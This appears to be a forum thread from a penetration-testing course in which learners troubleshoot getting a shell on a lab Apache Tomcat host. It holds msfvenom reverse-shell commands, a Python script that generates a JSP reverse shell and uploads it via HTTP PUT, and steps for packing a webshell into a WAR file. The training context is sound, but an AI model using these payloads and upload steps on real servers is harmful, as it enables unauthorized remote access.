Shells & payloads - The live engagement - host #1

Hi,

now I’ve been struggling for 10 hours with the first host and couldn’t make any progress so some serious help would be really appreciated.

I found and followed the next article that didn’t work:
[How to Hack Apache Tomcat via Malicious WAR File Upload « Null Byte :: WonderHowTo]

I also found the following video, no help:
https://www.youtube.com/watch?v=JTgUI3BKJek

Mixed the two, added my own ideas but nothing. I was able to upload the war file, clicked on it but nothing happened altough I tried out both Netcat and Metasploit as a listener.

In addition, probably I’m missing something but the given version of Tomcat doesn’t have any crticial or high level vulnerability.
https://tomcat.apache.org/security-10.html

I’m really clueless, the linked solutions should work but they don’t, so…

Hey Zsombi

Im also having the same issues as you and spent about the same time as you have. I’ve tried different payloads and tried using the other ip’s listed in ifconfig. I got nothing to work thought metasploit, i managed to upload a .war webshell that works some what but, it looks like the output is being filtered out (heres the web shell GitHub - p0dalirius/Tomcat-webshell-application: A webshell application and interactive shell for pentesting Apache Tomcat servers.) there’s also a good set of examples here (Tomcat - HackTricks) i tried both webshells here as well.

Im wondering if the target has been updated as you mentioned there is no high level vulnerability’s for the version that is running currently. Hopefully someone can help us two inspiring pen testers out!

Use msfvenom for this and all will be fine.

I’m stuck on HOST-1: I had tried create a WAR file with a Java reverse shell in Msfvenom and uploaded it to Tomcat but I get a HTTP 500 Error when I try to deploy it for a reverse shell. I had also tried used Msfconsole: Tomcat_mgr_upload exploit but it not work there either. Can anyone give me a Hint? I have no clue after working on this many hours..

Screenshot_20221113_0640351126×509 315 KB

Where you able to fix this?

I had also tried used Msfconsole: Tomcat_mgr_upload exploit but it not work there either. Can anyone give me a Hint? I have no clue after working on this many hours…

I am facing the same problem.
Is there any way to solve this?

Hello everyone …i got stuck in ( Exploit the target and gain a shell session. Submit the name of the folder located in C:\Shares\ (Format: all lower case) …while scanning with nmap it shows only one port open i.e-3389 and i dont know how to proceed with this

Make sure you’re scanning the right target, remember you’re connecting to a host via rdp first and then scanning the target. if you scan the host IP you’ll only get the open port 3389

I’m lost on that one. My war file generated with msfvenom doesn’t work. I keep getting HTTP Status 500 - Internal Server Error, when I try to execute it. If i try it again after some time, I get 404 - Not found.

HTTP Status 500 – Internal Server Error

Type Exception Report

Message Error instantiating servlet class [metasploit.PayloadServlet]

Description The server encountered an unexpected condition that prevented it from fulfilling the request.

Exception

jakarta.servlet.ServletException: Error instantiating servlet class [metasploit.PayloadServlet]
org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)
org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)
org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:353)
org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:382)
org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:870)
org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1699)
org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)
org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
java.lang.Thread.run(Unknown Source)

Root Cause

java.lang.NoClassDefFoundError: javax/servlet/http/HttpServlet
java.lang.ClassLoader.defineClass1(Native Method)
java.lang.ClassLoader.defineClass(Unknown Source)
java.security.SecureClassLoader.defineClass(Unknown Source)
org.apache.catalina.loader.WebappClassLoaderBase.findClassInternal(WebappClassLoaderBase.java:2516)
org.apache.catalina.loader.WebappClassLoaderBase.findClass(WebappClassLoaderBase.java:872)
org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1408)
org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1252)
org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)
org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)
org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:353)
org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:382)
org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:870)
org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1699)
org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)
org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
java.lang.Thread.run(Unknown Source)

Root Cause

java.lang.ClassNotFoundException: javax.servlet.http.HttpServlet
org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1444)
org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1252)
java.lang.ClassLoader.defineClass1(Native Method)
java.lang.ClassLoader.defineClass(Unknown Source)
java.security.SecureClassLoader.defineClass(Unknown Source)
org.apache.catalina.loader.WebappClassLoaderBase.findClassInternal(WebappClassLoaderBase.java:2516)
org.apache.catalina.loader.WebappClassLoaderBase.findClass(WebappClassLoaderBase.java:872)
org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1408)
org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1252)
org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)
org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)
org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:353)
org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:382)
org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:870)
org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1699)
org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)
org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
java.lang.Thread.run(Unknown Source)

Note The full stack trace of the root cause is available in the server logs.
Apache Tomcat/10.0.11

I tried to create a Python code: This code is a Python script that generates a reverse shell in Java Server Pages (JSP) format, and then uploads it to a target web server using the HTTP PUT method. The target web server is specified by the target_ip and target_port variables, which are set to "172.16.1.11" and 8080 respectively.

The reverse shell is generated using the msfvenom command-line tool and saved to a file named shell.jsp. The contents of this file are then read and stored in the body variable.

Next, the script establishes an HTTP connection to the target web server and sends an HTTP PUT request to upload the reverse shell to the server. The request includes the headers specified in the headers dictionary, which includes information such as the host, user agent, and content type.

Finally, the script checks the response status of the HTTP PUT request, and if it is 204 or 201, it sends an HTTP GET request to retrieve the uploaded reverse shell from the server and prints the response status and reason.

#! /usr/bin/python

import http.client
import os

target_ip = “172.16.1.11”
target_port = 8080

print(“Generating JSP reverse shell”)
os.system(“msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=4444 -f raw > shell.jsp”)

body = open(“shell.jsp”).read()

target_ip = “172.16.1.11”
target_port = 8080

conn = http.client.HTTPConnection(target_ip, target_port)
headers = {“Host”: “%s:%s”%(target_ip, target_port),
“Accept-Language”: “en”,
“User-Agent”: “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)”,
“Connection”: “close”,
“Content-Type”: “application/x-www-form-urlencoded”}
conn.request(“PUT”, “/shell.jsp/”, body, headers)
r1 = conn.getresponse()
print(r1.status, r1.reason)

if r1.status == 204 or r1.status == 201:
conn.request(“GET”, “/shell.jsp”)
r2 = conn.getresponse()
print(r2.status, r2.reason)

I tried .war file and .jsp, but that didn’t work as well =/

Use the web shell payload available in github. Create a war file and replace the jsp file with the webshell script. Upload and run it you will gain the shell.
Happy Hacking

this took me so long to figure out and all because of a silly mistake. In case others make the same rookie error as me…when you’re crafting your payload, make sure you’re using the right network interface. It’s not your 10.129.xx IP

Has anyone made progress on this? I am wondering if i am missing someting? I have attemped to upload a file to the (example.inlanefreight.local) url, with no luck after trying to go to the URL…i get the 404 error. Moreover, when logging into the URL found in the nmap enumeration, i cannot get my war file to connect back to me, or even locate the page after i upload my war file and go to the directory - again i am faced with a 404 error. Am i missing something obvious? Would greatly appriciate any feedback on this.

the issue I faced with my war file was that I set the wrong IP for it to try and connect back to. It’s not your 10.129.x

in terms of triggering it, I don’t believe you need to navigate to the file. From memory, there is another button you can click to trigger it within the tomcat manager interface*

*I’m pretty sure this is right, but if that doesn’t get you down the right path, DM me and I can jump back into that section and have a better look for you

Hey I’m assuming that you are on host 1 right? There’s really only a couple of steps. In all honesty it took me a while so I’ll help others out here too.

1. Login to host and to tomcat using the credentials you have then go to the app manager section
2. Find a .jsp webshell or reverse shell on github (the first one you find may not work)
3. If you get it in raw format from github you need to:
   3.1) nano cmd.jsp
   3.2) copy and paste your code edit ip and port if necessary
   3.3) mkdir webshell
   3.4) cp cmd.jsp webshell
   3.5) jar -cvf …/webshell.war *
4. Once you go back a directory you will see your .war file. Upload and deploy it.
   4.1) nc -nvlp (if you are doing a reverse shell)
5. if you are getting a 500 error it’s not going work so find a new shell and repeat the steps. If you get a 400 error you are probably on the wrong path to find your file. When you click on your upload in Apache or you navigate to your file make sure you go to the right path in my example you go to /webshell/cmd.jsp not just /webshell. You will be taken to /webshell at first so make sure you navigate to your file.
   *** If you need advice on a webshell to use let me know I found a great one for this task. This took me forever as well. I thought it was like the box Jerry on the main platform and it lulled me into a false sense of security.

On step #4, I only see Links 2 web browser and no “Upload” button as there would be in Firefox. “Upload and deploy it” should be easy… I’m just missing something.

Just watching this. msfvenom worked, msf exploit did not work. Cheatsheet 115 was helpful.

I hope you solved this issue, but this for some people still struck on this module my comment will be useful, hint is first during the gartering information list what information you got like which server, open ports, any vulnerable server after that re-check all the study modules one by one like if you detect windows server check all windows modules if you get the linux check all the linux modules try all step one by one slow you might get right. When we focus and overthink it take many day to solve this labs.

This was the way to go specifically making sure you are using the right IP address. 172.16.X.X Also there is a msfvenom command that will work and you will understand when you see it.

Well, the host 1 is tricky, spent a couple of hours…

Initially, I tried to upload a web-shell, tried several, including packing mine js into a war. It didn’t work, I could upload and see the application in the list, click on it - and was getting 404 constantly.

Switched to MSF, used multi/http/tomcat_mgr_upload which worked the same way basically. It was able to upload the payload (random names in the apps list), but failed to execute it. Again, when I manually tried to open the MSF’s jsp from the browser, I was getting 404. Listener was started on the proper IP of course.

And finally, msfvenom, exactly from the cheatsheet did the trick…

I wonder what was happening to the previous payloads, did AV kill them on upload?